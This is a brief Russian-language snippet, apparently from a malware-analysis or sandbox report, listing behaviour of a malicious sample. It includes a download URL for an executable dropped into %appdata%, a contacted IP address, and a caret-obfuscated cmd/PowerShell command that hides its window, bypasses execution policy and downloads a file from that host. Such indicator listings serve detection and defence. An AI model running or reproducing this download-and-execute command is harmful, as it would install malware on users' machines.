Техническая информация
- http://86.106.131.141/file.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^wersH^ELl^.E^xe ^-^eXeC^u^tI^oNPo^L^Ic^y ^bY^P^AsS^ -no^pRo^fILe -^WINdO^w^sTYLE H^I^Dde^n^ (nEW^-^OBJEcT ^sy^sTem.ne^t.WEB^ClI^En^t).^DoW^nl^OaDF^ile('http://86.106.1...
- '86.##6.131.141':80
- '<SYSTEM32>\cmd.exe' /c "pO^wersH^ELl^.E^xe ^-^eXeC^u^tI^oNPo^L^Ic^y ^bY^P^AsS^ -no^pRo^fILe -^WINdO^w^sTYLE H^I^Dde^n^ (nEW^-^OBJEcT ^sy^sTem.ne^t.WEB^ClI^En^t).^DoW^nl^OaDF^ile('http://86.106.1...' (со скрытым окном)